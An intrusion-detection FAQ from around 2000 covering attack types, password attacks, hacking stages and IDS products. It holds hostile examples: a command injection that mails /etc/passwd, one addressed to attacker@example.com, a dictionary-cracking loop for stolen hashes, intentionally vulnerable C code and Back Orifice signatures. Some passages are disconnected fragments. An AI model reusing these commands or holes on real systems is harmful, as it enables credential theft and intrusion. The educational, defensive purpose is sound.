This FAQ answers simple questions related to detecting intruders who attack systems through the network, especially how such intrusions can be detected. Questions? Feedback? Send mail to nids-faq @ robertgraham.com
Copyright 1998-2000 by Robert Graham (mailto:nids-faq1@RobertGraham.com). All rights reserved. This document may be reproduced only for non-commercial purposes. All reproductions must contain this exact copyright notice. Reproductions must not contain alterations except by permission.
Olaf Schreck <chakl at syscall de>
John Kozubik <john_kozubik at hotmail com> (see http://www.networkcommand.com/john/index.html for NT login-script tips).
Aaron Bawcom <abawcom at pacbell net>
Mike Kienenberger <mkienenb at arsc edu>
Keiji Takeda <keiji at sfc keio ac jp>
Scott Hamilton <sah at uow edu au>
Holger Heimann <hh at it-sec de>
Bennett Todd <bet at mordor dot net>
An intrusion is somebody (A.K.A. "hacker" or "cracker") attempting to break into or misuse your system. The word "misuse" is broad, and can reflect something as severe as stealing confidential data or something as minor as misusing your email system for spam (though for many of us, that is a major issue!).
An "Intrusion Detection System (IDS)" is a system for detecting such intrusions. For the purposes of this FAQ, IDS can be broken down into the following categories:
network intrusion detection systems (NIDS) monitor packets on the network wire and attempt to discover if a hacker/cracker is attempting to break into a system (or cause a denial of service attack). A typical example is a system that watches for a large number of TCP connection requests (SYN) to many different ports on a target machine, thus discovering if someone is attempting a TCP port scan. A NIDS may run either on the target machine, which watches its own traffic (usually integrated with the stack and services themselves), or on an independent machine promiscuously watching all network traffic (hub, router, probe). Note that a "network" IDS monitors many machines, whereas the others monitor only a single machine (the one they are installed on).
system integrity verifiers (SIV) monitor system files to find when an intruder changes them (thereby leaving behind a backdoor). The most famous of such systems is "Tripwire". A SIV may watch other components as well, such as the Windows registry and cron configuration, in order to find well-known signatures. It may also detect when a normal user somehow acquires root/administrator level privileges. Many existing products in this area should be considered more "tools" than complete "systems": i.e. something like "Tripwire" detects changes in critical system components, but doesn't generate real-time alerts upon an intrusion.
log file monitors (LFM) monitor log files generated by network services. In a similar manner to NIDS, these systems look for patterns in the log files that suggest an intruder is attacking. A typical example would be a parser for HTTP server log files that looks for intruders who try well-known security holes, such as the "phf" attack (a minimal sketch of such a parser appears after this list). Example: swatch
deception systems (A.K.A. decoys, lures, fly-traps, honeypots) contain pseudo-services whose goal is to emulate well-known holes in order to trap hackers. See The Deception ToolKit http://www.all.net/dtk/ for an example. Simple tricks can also be used, such as renaming the "administrator" account on NT and then setting up a dummy account with no rights but extensive auditing. There is more on "deception" later in this document. Also see http://www.enteract.com/~lspitz/honeypot.html
other
For more info, see http://www.icsa.net/idswhite/.
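To make the log-file-monitor idea concrete, here is a minimal sketch in C that scans an HTTP access log for the "phf" attack mentioned above. The log path is only an assumption; real tools such as swatch are far more flexible about patterns and actions.

  /* Minimal log-file monitor sketch: flag access-log lines containing the
     well-known "phf" attack.  The log path is illustrative. */
  #include <stdio.h>
  #include <string.h>

  int main(void)
  {
      char line[4096];
      FILE *f = fopen("/var/log/httpd/access_log", "r");  /* assumed location */
      if (!f) { perror("fopen"); return 1; }
      while (fgets(line, sizeof(line), f) != NULL) {
          if (strstr(line, "/cgi-bin/phf") != NULL)
              printf("possible phf attempt: %s", line);
      }
      fclose(f);
      return 0;
  }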
Intruders can be classified into two categories: outsiders, who attack from outside your network, and insiders, who legitimately use your internal network but misuse their privileges or impersonate higher-privileged users.
There are several types of intruders. Joy riders hack because they can. Vandals are intent on causing destruction or marking up your web pages. Profiteers are intent on profiting from their enterprise, such as rigging the system to give them money or stealing corporate data and selling it.
Physical Intrusion If intruders have physical access to a machine (i.e. they can use the keyboard or take apart the system), they will be able to get in. Techniques range from special privileges the console has, to the ability to physically take apart the system and remove the disk drive (and read/write it on another machine). Even BIOS protection is easy to bypass: virtually all BIOSes have backdoor passwords.
System Intrusion This type of hacking assumes the intruder already has a low-privilege user account on the system. If the system doesn't have the latest security patches, there is a good chance the intruder will be able to use a known exploit in order to gain additional administrative privileges.
Remote Intrusion This type of hacking involves an intruder who attempts to penetrate a system remotely across the network. The intruder begins with no special privileges. There are several forms of this hacking. For example, an intruder has a much more difficult time if there is a firewall between him/her and the victim machine.
Note that Network Intrusion Detection Systems are primarily concerned with Remote Intrusion.
Buffer overflows: Almost all the security holes you read about in the press are due to this problem. A typical example is a programmer who sets aside 256 characters to hold a login username. Surely, the programmer thinks, nobody will ever have a name longer than that. But a hacker thinks: what happens if I enter a false username longer than that? Where do the additional characters go? If the hacker does the job just right, they can send 300 characters, including code that will be executed by the server, and voila, they've broken in. Hackers find these bugs in several ways. First of all, the source code for a lot of services is available on the net. Hackers routinely look through this code searching for programs that have buffer overflow problems. Secondly, hackers may look at the programs themselves to see if such a problem exists, though reading assembly output is really difficult. Thirdly, hackers will examine every place the program has input and try to overflow it with random data. If the program crashes, there is a good chance that carefully constructed input will allow the hacker to break in. Note that this problem is common in programs written in C/C++, but rare in programs written in Java.
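Here is a tiny C sketch of the mistake described above, plus a bounded version of the same copy; the function and buffer names are made up for illustration.

  #include <string.h>

  /* BAD: a fixed 256-byte buffer and an unbounded copy.  A "username" longer
     than the buffer overwrites adjacent memory, including the saved return
     address, which is what lets an attacker inject code. */
  void handle_login(const char *username)
  {
      char name[256];
      strcpy(name, username);            /* no length check -- overflow here */
      /* ... authenticate 'name' ... */
  }

  /* Safer: bound the copy and terminate the string explicitly. */
  void handle_login_safe(const char *username)
  {
      char name[256];
      strncpy(name, username, sizeof(name) - 1);
      name[sizeof(name) - 1] = '\0';
  }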
Unexpected combinations: Programs are usually constructed using many layers of code, including the underlying operating system as the bottom-most layer. Intruders can often send input that is meaningless to one layer, but meaningful to another layer. The most common language for processing user input on the web is PERL. Programs written in PERL will usually send this input to other programs for further evaluation. A common hacking technique would be to enter something like "| mail < /etc/passwd". This gets executed because PERL asks the operating system to launch an additional program with that input. However, the operating system intercepts the pipe '|' character and launches the 'mail' program as well, which causes the password file to be emailed to the intruder.
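The same "unexpected combination" bites C programs that paste user input into a shell command line. A minimal illustration (the command and file names are invented for the example):

  #include <stdio.h>

  /* BAD: user input goes straight into a shell command, so shell
     metacharacters such as '|' and ';' are interpreted by /bin/sh. */
  void mail_report(const char *user_supplied_address)
  {
      char cmd[512];
      /* If the "address" is  "nobody; mail attacker@example.com < /etc/passwd"
         the shell happily runs the second command too. */
      snprintf(cmd, sizeof(cmd), "mail %s < /tmp/report.txt", user_supplied_address);
      FILE *p = popen(cmd, "r");         /* runs: /bin/sh -c "mail ..." */
      if (p) pclose(p);
  }

The fix in any language is the same: validate or escape the input, or avoid handing it to a shell at all.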
Unhandled input: Most programs are written to handle valid input. Most programmers do not consider what happens when somebody enters input that doesn't match the specification.
Race conditions: Most systems today are "multitasking/multithreaded". This means that they can execute more than one program at a time. There is a danger if two programs need to access the same data at the same time. Imagine two programs, A and B, that need to modify the same file. In order to modify a file, each program must first read the file into memory, change the contents in memory, then copy the memory back out into the file. The race condition occurs when program A reads the file into memory, then makes the change. However, before A gets to write the file, program B steps in and does the full read/modify/write on the file. Now program A writes its copy back out to the file. Since program A started with a copy from before B made its changes, all of B's changes will be lost. Since you need to get the sequence of events in just the right order, race conditions are very rare. Intruders usually have to try thousands of times before they get it right and hack into the system.
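The read/modify/write pattern described above looks like the following C sketch; the file name is illustrative. Run two copies at once and whichever writes last silently wipes out the other's update, which is why such files need locking (for example with flock() or fcntl()).

  #include <stdio.h>

  int main(void)
  {
      int counter = 0;
      FILE *f = fopen("/tmp/counter", "r");       /* 1. read the file */
      if (f) { fscanf(f, "%d", &counter); fclose(f); }

      counter++;                                   /* 2. modify in memory */

      /* 3. write it back.  If another process did its own read/modify/write
         in the window between steps 1 and 3, its change is lost here. */
      f = fopen("/tmp/counter", "w");
      if (f) { fprintf(f, "%d\n", counter); fclose(f); }
      return 0;
  }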
Default configurations: Most systems are shipped to customers with default, easy-to-use configurations. Unfortunately, "easy-to-use" often means "easy-to-break-into". Almost any UNIX or WinNT machine shipped to you can be hacked into easily.
Lazy administrators: A surprising number of machines are configured with an empty root/administrator password. This is because the administrator is too lazy to configure one right now and wants to get the machine up and running quickly with minimal fuss. Unfortunately, they never get around to setting the password later, allowing intruders easy access. One of the first things an intruder will do on a network is to scan all machines for empty passwords.
Hole creation: Virtually all programs can be configured to run in a non-secure mode. Sometimes administrators will inadvertently open a hole on a machine. Most administration guides will suggest that administrators turn off everything that doesn't absolutely positively need to run on a machine in order to avoid accidental holes. Note that security auditing packages can usually find these holes and notify the administrator.
Trust relationships: Intruders often "island hop" through the network exploiting trust relationships. A network of machines trusting each other is only as secure as its weakest link.
Really weak passwords: Most people use the names of themselves, their children, spouse/SO, pet, or car model as their password. Then there are the users who choose "password" or simply nothing. This gives a list of fewer than 30 possibilities that an intruder can type in for themselves.
Dictionary attacks: Failing the above attack, the intruder can next try a "dictionary attack". In this attack, the intruder will use a program that tries every possible word in the dictionary. Dictionary attacks can be done either by repeatedly logging into systems, or by collecting encrypted passwords and attempting to find a match by similarly encrypting all the passwords in the dictionary. Intruders usually have a copy of the English dictionary as well as foreign language dictionaries for this purpose. They also use additional dictionary-like databases, such as names (see above) and lists of common passwords.
Brute force attacks: Similar to a dictionary attack, an intruder may try all possible combinations of characters. A short 4-letter password consisting of lower-case letters can be cracked in just a few minutes (roughly half a million possible combinations). A long 7-character password consisting of upper and lower case, as well as numbers and punctuation (10 trillion combinations), can take months to crack assuming you can try a million combinations a second (in practice, a thousand combinations per second is more likely for a single machine).
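For a feel for the arithmetic, the following small program reproduces the figures above; the exact character set (26 lower, 26 upper, 10 digits, and roughly 10 punctuation marks) is an assumption made for illustration.

  #include <stdio.h>

  int main(void)
  {
      double lower4 = 1, mixed7 = 1;
      for (int i = 0; i < 4; i++) lower4 *= 26;   /* 4 lowercase letters: ~457,000 combinations */
      for (int i = 0; i < 7; i++) mixed7 *= 72;   /* 7 mixed characters: ~1e13, the "10 trillion" above */

      printf("4-char lowercase: %.0f combinations\n", lower4);
      printf("7-char mixed:     %.0f combinations\n", mixed7);
      printf("  at 1,000,000 guesses/sec: about %.0f days\n", mixed7 / 1e6 / 86400);
      printf("  at 1,000 guesses/sec:     about %.0f years\n", mixed7 / 1e3 / 86400 / 365);
      return 0;
  }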
Shared medium: On traditional Ethernet, all you have to do is put a Sniffer on the wire to see all the traffic on a segment. This is getting more difficult now that most corporations are transitioning to switched Ethernet.
Server sniffing: However, on switched networks, if you can install a sniffing program on a server (especially one acting as a router), you can probably use that information to break into client machines and trusted machines as well. For example, you might not know a user's password, but sniffing a Telnet session when they log in will give you that password.
Remote sniffing: A large number of boxes come with RMON enabled and public community strings. While the bandwidth is really low (you can't sniff all the traffic), it presents interesting possibilities.
TCP/IP protocol flaws: The TCP/IP protocol was designed before we had much experience with the wide-scale hacking we see today. As a result, there are a number of design flaws that lead to possible security problems. Some examples include smurf attacks, ICMP Unreachable disconnects, IP spoofing, and SYN floods. The biggest problem is that the IP protocol itself is very "trusting": hackers are free to forge and change IP data with impunity. IPsec (IP security) has been designed to overcome many of these flaws, but it is not yet widely used.
UNIX design flaws: There are a number of inherent flaws in the UNIX operating system that frequently lead to intrusions. The chief problem is the access control system, where only 'root' is granted administrative rights. As a result, many programs that need only limited privileges must run as root (for example via setuid), so a bug in any one of them can hand an intruder complete control of the system.
Clear-text sniffing: A number of protocols (Telnet, FTP, HTTP Basic) use clear-text passwords, meaning that they are not encrypted as they go over the wire between the client and the server. An intruder with a protocol analyzer can watch the wire looking for such passwords. No further effort is needed; the intruder can immediately start using those passwords to log in.
Encrypted sniffing: Most protocols, however, use some sort of encryption on the passwords. In these cases, the intruder will need to carry out a dictionary or brute force attack on the password in order to attempt decryption. Note that you still don't know about the intruder's presence, as he/she has been completely passive and has not transmitted anything on the wire. Password cracking does not require anything to be sent on the wire, as the intruder's own machine is used to test candidate passwords against the captured data.
Replay attack: In some cases, intruders do not need to decrypt the password. They can use the encrypted form instead in order to login to systems. This usually requires reprogramming their client software in order to make use of the encrypted password.
Password file stealing: The entire user database is usually stored in a single file on the disk. In UNIX, this file is /etc/passwd (or some mirror of that file), and under WinNT it is the SAM file. Either way, once an intruder gets hold of this file, he/she can run cracking programs (described above) in order to find some weak passwords within the file.
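For illustration, here is a minimal sketch of what such an offline cracking program does against a stolen UNIX-style entry: hash each dictionary word with the stolen entry's salt and compare. The hash value and wordlist path are invented for the example; on some systems crypt() lives in <crypt.h> and needs -lcrypt.

  #define _XOPEN_SOURCE
  #include <stdio.h>
  #include <string.h>
  #include <unistd.h>

  int main(void)
  {
      const char *stolen = "ab01FAX.bQRSU";     /* illustrative DES-crypt hash */
      char salt[3] = { stolen[0], stolen[1], '\0' };
      char word[128];
      FILE *dict = fopen("/usr/share/dict/words", "r");
      if (!dict) { perror("fopen"); return 1; }

      while (fgets(word, sizeof(word), dict) != NULL) {
          word[strcspn(word, "\n")] = '\0';      /* strip newline */
          const char *hash = crypt(word, salt);  /* hash the guess with the same salt */
          if (hash && strcmp(hash, stolen) == 0) {
              printf("password found: %s\n", word);
              break;
          }
      }
      fclose(dict);
      return 0;
  }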
Observation: One of the traditional problems in password security is that passwords must be long and difficult to guess (in order to make dictionary and brute force cracks unreasonably difficult). However, such passwords are often difficult to remember, so users write them down somewhere. Intruders can often search a person's work area in order to find passwords written on little pieces of paper (usually under the keyboard). Intruders can also train themselves to watch passwords being typed in over a user's shoulder.
Social Engineering: A common (successful) technique is to simply call the user and say "Hi, this is Bob from MIS. We're trying to track down some problems on the network and they appear to be coming from your machine. What password are you using?" Many users will give up their password in this situation. (Most corporations have a policy telling users to never give out their password, even to their own MIS department, but this technique is still successful. One easy way around this is for MIS to call a new employee six months after being hired and ask for their password, then criticize them for giving it out in a manner they will not forget :-)
A typical scenario might be:
Step 1: outside reconnaissance The intruder will find out as much as possible without actually giving themselves away. They will do this by finding public information or appearing as a normal user. In this stage, you really can't detect them. The intruder will do a 'whois' lookup to find as much information as possible about your network as registered along with your Domain Name (such as foobar.com). The intruder might walk through your DNS tables (using 'nslookup', 'dig', or other utilities to do domain transfers) to find the names of your machines. The intruder will browse other public information, such as your public web sites and anonymous FTP sites. The intruder might search news articles and press releases about your company.
Step 2: inside reconnaissance The intruder uses more invasive techniques to scan for information, but still doesn't do anything harmful. They might walk through all your web pages and look for CGI scripts (CGI scripts are often easily hacked). They might do a 'ping' sweep in order to see which machines are alive. They might do a UDP/TCP scan/strobe on target machines in order to see what services are available. They'll run utilities like 'rpcinfo', 'showmount', 'snmpwalk', etc. in order to see what's available. At this point, the intruder has done 'normal' activity on the network and has not done anything that can be classified as an intrusion. At this point, a NIDS will be able to tell you that "somebody is checking door handles", but nobody has actually tried to open a door yet.
Step 3: exploit The intruder crosses the line and starts exploiting possible holes in the target machines. The intruder may attempt to compromise a CGI script by sending shell commands in input fields. The intruder might attempt to exploit well-known buffer-overrun holes by sending large amounts of data. The intruder may start checking for login accounts with easily guessable (or empty) passwords. The hacker may go through several stages of exploits. For example, if the hacker was able to access a user account, they will now attempt further exploits in order to get root/admin access.
Step 4: foothold At this stage, the hacker has successfully gained a foothold in your network by hacking into a machine. The intruder's main goals are to hide evidence of the attacks (doctoring the audit trail and log files) and to make sure they can get back in again. They may install 'toolkits' that give them access, replace existing services with their own Trojan horses that have backdoor passwords, or create their own user accounts. System Integrity Verifiers (SIVs) can often detect an intruder at this point by noting the changed system files. The hacker will then use the system as a stepping stone to other systems, since most networks have fewer defenses against inside attacks.
Step 5: profit The intruder takes advantage of their status to steal confidential data, misuse system resources (i.e. stage attacks at other sites from your site), or deface web pages.
Another scenario starts differently. Rather than attacking a specific site, an intruder might simply scan random Internet addresses looking for a specific hole. For example, an intruder may attempt to scan the entire Internet for machines that have the SendMail DEBUG hole. They simply exploit such machines as they find them. They don't target you directly, and they really won't even know who you are. (This is known as a 'birthday attack'; given a list of well-known security holes and a list of IP addresses, there is a good chance that there exists some machine somewhere that has one of those holes.)
reconnaissance These include ping sweeps, DNS zone transfers, e-mail recons, TCP or UDP port scans, and possibly indexing of public web servers to find CGI holes.
exploits Intruders will take advantage of hidden features or bugs to gain access to the system.
denial-of-service (DoS) attacks Where the intruder attempts to crash a service (or the machine), overload network links, overload the CPU, or fill up the disk. The intruder is not trying to gain information, but simply acts as a vandal to prevent you from making use of your machine.
Web servers often have bugs related to their interaction with the underlying operating system. An old hole in Microsoft IIS dealt with the fact that files have two names, a long filename and a short 8.3 hashed equivalent, which could sometimes be accessed while bypassing permissions. NTFS (the new file system) has a feature called "alternate data streams" that is similar to the Macintosh data and resource forks. You could access the file through its stream name by appending "::$DATA" in order to see a script rather than run it.
Servers have long had problems with URLs. For example, the "death by a thousand slashes" problem in older Apache would cause huge CPU loads as it tried to process each directory in a thousand slash URL.
URL fields can cause a buffer overflow condition, either as the URL is parsed in the HTTP header, as it is displayed on the screen, or as it is processed in some form (such as saved in the cache history). Also, an old bug in Internet Explorer allowed a web page to make the browser execute .LNK or .URL commands.
HTTP headers can be used to exploit bugs because some fields are passed to functions that expect only certain information.
HTML can often be exploited, such as the MIME-type overflow in Netscape Communicator's <EMBED> command.
JavaScript is a perennial favorite, and usually tries to exploit the "file upload" function by generating a filename and automatically hiding the "SUBMIT" button. There have been many variations of this bug fixed, then new ways found to circumvent the fixes.
Frames are often used as part of a JavaScript or Java hack (for example, hiding web pages in 1-pixel by 1-pixel frames), but they present special problems. For example, I can include a link to a trustworthy site that uses frames, then replace some of those frames with web pages from my own site, and they will appear to you to be part of that remote site.
Java has a robust security model, but that model has proven to have the occasional bug (though compared to everything else, it has proven to be one of the most secure elements of the whole system). Moreover, its robust security may be its undoing: Normal Java applets have no access to the local system, but sometimes they would be more useful if they did have local access. Thus, the implementation of "trust" models that can more easily be hacked.
ActiveX is even more dangerous than Java as it works purely from a trust model and runs native code. You can even inadvertently catch a virus that was accidentally embedded in some vendor's code.
IP spoofing is frequently used as part of other attacks.
More importantly, there is the issue of legal liability. You are potentially liable for damages caused by a hacker using your machine. You must be able to prove to a court that you took "reasonable" measures to defend yourself from hackers. For example, consider if you put a machine on a fast link (cable modem or DSL) and left administrator/root accounts open with no password. Then if a hacker breaks into that machine, then uses that machine to break into a bank, you may be held liable because you did not take the most obvious measures in securing the machine.
There is a good paper http://www.cert.org/research/JHThesis/Start.html by John D. Howard that discusses how much hacking goes on over the Internet, and how much danger you are in.
The NIPC was set up by the FBI in mid 1998, and its first major activity was to help track down the source of the Melissa virus (W97M.Melissa). The CyberNotes archive goes back to January 1999.
The benefit of this approach is that it can detect the anomalies without having to understand the underlying cause behind the anomalies.
For example, let's say that you monitor the traffic from individual workstations. Then, the system notes that at 2am, a lot of these workstations start logging into the servers and carrying out tasks. This is something interesting to note and possibly take action on.
This can be as simple as a pattern match. The classic example is to examine every packet on the wire for the pattern "/cgi-bin/phf?", which might indicate somebody attempting to access this vulnerable CGI script on a web server. Some IDS systems are built from large databases that contain hundreds (or thousands) of such strings. They just plug into the wire and trigger on every packet they see that contains one of these strings.
Traffic consists of IP datagrams flowing across a network. A NIDS is able to capture those packets as they flow by on the wire. A NIDS consists of a special TCP/IP stack that reassembles IP datagrams and TCP streams. It then applies some of the following techniques:
Protocol stack verification A number of intrusions, such as "Ping-O-Death" and "TCP Stealth Scanning", use violations of the underlying IP, TCP, UDP, and ICMP protocols in order to attack the machine. A simple verification system can flag invalid packets. This can include valid, but suspicious, behavior such as severely fragmented IP packets.
Application protocol verification A number of intrusions use invalid protocol behavior, such as "WinNuke", which uses invalid NetBIOS protocol (adding OOB data), or DNS cache poisoning, which has a valid but unusual signature. In order to effectively detect these intrusions, a NIDS must re-implement a wide variety of application-layer protocols in order to detect suspicious or invalid behavior.
Creating new loggable events A NIDS can be used to extend the auditing capabilities of your network management software. For example, a NIDS can simply log all the application layer protocols used on a machine. Downstream event log systems (WinNT Event, UNIX syslog, SNMP TRAPS, etc.) can then correlate these extended events with other events on the network.
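As a small illustration of the last technique, a sensor might hand an extended event to the local UNIX syslog, where downstream log systems can pick it up and correlate it. This is only a sketch; the program name and message format are assumptions.

  #include <syslog.h>

  void log_session(const char *proto, const char *src, const char *dst)
  {
      openlog("nids-sensor", LOG_PID, LOG_DAEMON);
      syslog(LOG_NOTICE, "%s session observed from %s to %s", proto, src, dst);
      closelog();
  }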
An example would be to do a traceroute against the victim. This will often generate a low-level event in the IDS. Traceroutes are harmless and frequent on the net, so they don't indicate an attack. However, since many attacks are preceded by traceroutes, IDSs will log them anyway. As part of the logging system, it will usually do a reverse-DNS lookup. Therefore, if you run your own DNS server, then you can detect when somebody is doing a reverse-DNS lookup on your IP address in response to your traceroute.
%systemroot%/system32 directory.
Also consider physical intrusion prevention network-wide. John Kozubik suggests using login scripts to force the built-in password-protected screen saver. In the login script, include a line like:
regedit /s \\MY_PDC\netlogon\scrn.reg

And in the file "scrn.reg", put the text:

REGEDIT4
[HKEY_CURRENT_USER\Control Panel\Desktop]
"ScreenSaveTimeOut"="1800"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="c:\winnt\system32\logon.scr"
"ScreenSaverIsSecure"="1"

This will trigger the password prompt to appear 30 minutes after a user is away from the desktop (it doesn't log them out; it just forces them to re-enter the password before they have access again).
The following are techniques for the typical user:
John Kozubik suggests the following techniques for corporate users (who presumably run login scripts from the servers). Since Win95/Win98 machines are so vulnerable, they provide easy penetration into the rest of the corporate environment. Win95 caches passwords in easy-to-read formats, so you want to remove them:
del c:\windows\*.pwl
REGEDIT /s \\MY_PDC\netlogon\nocache.reg

where "nocache.reg" consists of:

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network]
"DisablePwdCaching"=dword:00000001
RedHat Case Study When I first created this FAQ, I was working on a RedHat 5 system. After installation, it lit up like an xmas tree when port scanned. For example, it installs a DNS service. RedHat versions 5.0-5.2 could be hacked via buffer overflows in the default FTP, mountd, and DNS services. Similarly, RedHat versions 6.0-6.1 could be hacked via the DNS and FTP services. The point is: even if you get the latest patched software, if you install the default services, your box can almost certainly be hacked.
I've been told about the http://www.bastille-linux.org/ script that will take a default RedHat 6.0/6.1 system and "harden" it. I also recommend installing ipchains to firewall your connection to the Internet. Finally, I recommend going through /etc/inetd.conf and removing all unnecessary services.
Beyond that, I know of nothing in particular.
First and foremost, create a security policy. Let's say that you are watching the network late in the evening and you see an intrusion in progress. What do you do? Do you let the intrusion progress and collect evidence? Do you pull the plug? If so, do you pull the plug on the firewall between the intranet and extranet? Or do you take down the entire Internet connection (preventing users from getting to your web site)? Who has the authority to pull the plug?
The priorities need to be set in place by the CEO of the corporation. Let's consider the scenario where you think you are being attacked, so you pull the plug. The users get up in arms and complain. And, as it turns out, you were wrong, so your butt gets fried. Even when blatant attacks are going on, few people pull the plug for fear of just such repercussions. Data theft is theoretical; ticked-off users are very real. Therefore, you need a policy from the very top that clearly states the importance of things and clearly lays out a procedure for what happens when an intrusion is suspected. [Author: does anybody have sample policies they can send me?]
Once you have the priorities straight, you need to figure out the technology. That's described in the next section.
For the most part, a good response requires that you've set up good defensive measures in the first place. These include:
Below is a log showing a telnet connection from a machine within your domain. The machine it connected to does not offer this service publicly, so this can only be assumed to be an IP space probe for vulnerable machines. We take this matter seriously, and hope that you will as well. Please take action on this issue as is appropriate and respond to this address with your actions.

Nov 6 07:13:13 pbreton in.telnetd[31565]: refused connect from xx.xx.xx.xx

This log entry was likely generated by tcpwrappers, a facility that enhances logging and access control to services on UNIX. It shows an unauthorized attempt from your site to the specified machine. As claimed in the e-mail message, it may be an automated sweep of some sort. The most popular protocols people sweep with are ICMP, FTP, SMTP, NNTP, and Telnet.
In any case, this is evidence of a probe, not an attack. Furthermore, there is no other corroborating evidence. As pointed out by Greg Drew <gdrew at computer dot org> there could be a number of benign reasons:
As it turns out, the incident was benign. The target network had reconfigured itself, and the "unauthorized" user didn't know about it yet, and wasn't logging in correctly.
As far as I can tell, the best technique is to collect as much information as you can. For example, I've put a packet sniffer on our T-1 line, capturing to trace files on a 16-gigabyte disk (most any sniffing program on most platforms can do this). You may not think it fun, but I enjoy perusing these files. It's amazing how many TCP/UDP scans and other probes I see on a regular basis.
Likewise, you should make sure you have full auditing and logging enabled on any/all systems exposed to the Internet. These will help you figure out what happened when you were hacked.
See sections 4.4 and 4.5 below for a discussion of some freeware technologies.
Reviews can be found at:
Several of these have comments from the vendors themselves that they e-mailed me. Also note that this information can quickly become out of date. The industry has gone through several major changes since I started this document.
The site http://www.internations.net/uk/talisker/ has done a good job of wading through the marketing hype and pulling out the salient points about each of the commercial products.
BlackICE has multiple versions. The core is built around "BlackICE Sentry", a full network-based intrusion detection system. There are also host/hybrid versions that run on Windows desktops with a built-in personal firewall. The list of intrusions it detects is at: http://www.networkice.com/advICE/Intrusions
Distinguishing features of BlackICE Sentry are:
- Full 7-layer, stateful, protocol analysis
- Anti-evasion techniques (handles fragmentation, whisker scans, a whole suite of signature changing attacks)
- Extremely fast, easily handles full 100-mbps bandwidth.
Go to http://www.networkice.com/ for more information.
CyberCop Monitor is a hybrid host/network based IDS that analyzes network traffic to and from the host as well as Windows NT EventLog audit trails and Windows NT authentication activity.
- Developed under the Microsoft Management Console user interface, both CyberCop Monitor and the SMI Console integrate to provide an easy to use graphical interface for local / remote reporting, and remote installation.
- Configuration editor allows for custom settings and thresholds to suit every environment, including security profiles, account groups, time and subnets.
- Extensive filtering using ordered filter rules for each signature.
- Report coalescing feature suppresses denial of service on the IDS itself.
- Report collating of monitoring and scanning information per system with trend analysis options, including 3D charting and graphing from an SQL database.
Go to <http://www.nai.com/> for more information.
CyberCop Monitor was written from the ground up by NAI. There is NO connection with the CyberCop Network v.1.0 product developed by Network General/WheelGroup or the Haystack product from TIS - This was aging technology and shelved some months after each subsequent acquisition.
Internet Security Systems is the first and only company that has tied both intrusion detection (ISS RealSecure) and vulnerability detection (ISS Internet Scanner) into an integrated security platform to help organizations plan, analyze, and manage their security on a continuous basis. ISS RealSecure is a component of the ISS SAFEsuite family of products that cover managing security risk across the enterprise. ISS RealSecure is the market leader in intrusion detection with an integrated host- and network-based solution. ISS RealSecure comes with over 400 attack signatures, and customers of both the network- and host-based solutions can add or modify their own signatures.
Go to http://www.cai.com/solutions/enterprise/etrust/intrusion_detection.
Originally, SessionWall started out as more of a firewall/content-inspection platform that interposed itself in the stream of traffic. I'm not sure where it is now.
NFR is available in multiple forms: a freeware/research version (see below), the "NFR Intrusion Detection Appliance" which comes as a bootable CD-ROM, and bundles from 3rd-party resellers that add their own features on top of it (like Anzen). One of the popular features of NFR is "N-code", a fully featured programming language optimized for intrusion-detection-style capabilities. They have a full SMTP parser written in N-code. Most other systems either only let you add simple signatures or force you to use raw C programming. Numerous N-code scripts are downloadable from the Internet from sources such as L0pht.
NFR does more statistical analysis than other systems. The N-code system allows easy additions into this generic statistical machine.
A general description can be found at http://www.nfr.net/forum/publications/LISA-97.htm
"Regexp" (regular expression) is a common pattern-matching language in the UNIX environment. While it has traditionally been used for searching text files, it can also be used for arbitrary binary data. In truth, such systems have more flexible matching criteria, such as finding ports or matching TCP flags.
"libpcap" (library for packet capture) is a common library available for UNIX systems that "sniffs" packets off a wire. Most UNIX-based intrusion detection systems (of any kind) use libpcap, though many also have optimized drivers for a small subset of platforms.
The source code for both modules is freely available. A large number of intrusion detection systems simply feed the output of libpcap (or tcpdump) into the regular expression parser, where the expressions come from a file on the disk. Some even simpler systems don't even use regular expressions and simply compare packets with well-known byte patterns. If you want to build a system like this yourself, read up on 'tcpdump' and regular expressions. To understand libpcap/tcpdump, the following document will be helpful: http://www.robertgraham.com/pubs/sniffing-faq.html.
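Here is a bare-bones sketch, in C against libpcap, of the "network grep" approach just described: pull frames off the wire and flag any packet whose bytes contain a fixed pattern. The interface name and pattern are assumptions, and there is deliberately no IP or TCP reassembly, which is exactly the weakness discussed below.

  #include <pcap.h>
  #include <stdio.h>
  #include <string.h>

  /* Called by libpcap for every captured frame: do a naive byte-wise search. */
  static void handler(u_char *user, const struct pcap_pkthdr *h, const u_char *bytes)
  {
      const char *pat = "/cgi-bin/phf";
      size_t plen = strlen(pat);
      (void)user;
      for (size_t i = 0; h->caplen >= plen && i + plen <= h->caplen; i++)
          if (memcmp(bytes + i, pat, plen) == 0) {
              printf("phf pattern seen in a %u-byte packet\n", h->len);
              break;
          }
  }

  int main(void)
  {
      char errbuf[PCAP_ERRBUF_SIZE];
      /* "eth0" is illustrative; open whatever interface you monitor, promiscuously */
      pcap_t *p = pcap_open_live("eth0", 1600, 1, 1000, errbuf);
      if (!p) { fprintf(stderr, "pcap_open_live: %s\n", errbuf); return 1; }
      pcap_loop(p, -1, handler, NULL);
      pcap_close(p);
      return 0;
  }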
This class of intrusion detection system has one advantage: it is the easiest to update. Products of this class will consistently have the largest number of "signatures" and be the fastest time-to-market for detecting new popular attack "scripts".
However, while such systems may boast the largest number of "signatures", they detect the fewest "serious" intrusions. For example, the 8 bytes "CE63D1D2 16E713CF" seen at the start of UDP data indicate Back Orifice traffic with the default password. Even though 80% of Back Orifice attacks use the default password, the other 20% use different passwords and would not be detected by the system. For example, changing the Back Orifice password to "evade" changes the pattern to "8E42A52C 0666BC4A", which would go undetected by "network grep" systems.
Some of these systems do not reassemble IP datagrams or TCP streams. Again, a hacker could simply reconfigure the MTU size on the machine in order to evade regexp-pcap systems.
Such systems also produce larger numbers of false positives. In the Back Orifice example above, the 64-bit pattern is not so rare that it will never appear in other traffic. This will cause alarms to go off even when no Back Orifice is present.
Systems based upon protocol analysis do not have these problems. They catch all instances of the attack, not just the common varieties; they result in fewer false positives; and they are often able to run faster because a protocol decode doesn't have to "search" a frame. They are also able to more fully diagnose the problem, for example distinguishing between a "Back Orifice PING" (which is harmless) and a "Back Orifice compromise" (which is an extreme condition). On the other hand, it can often take a week to add a new protocol analysis signature (rather than hours) due to the design and testing involved. Also, overly aggressive attempts to reduce false positives can lead to missing real attacks in some cases.
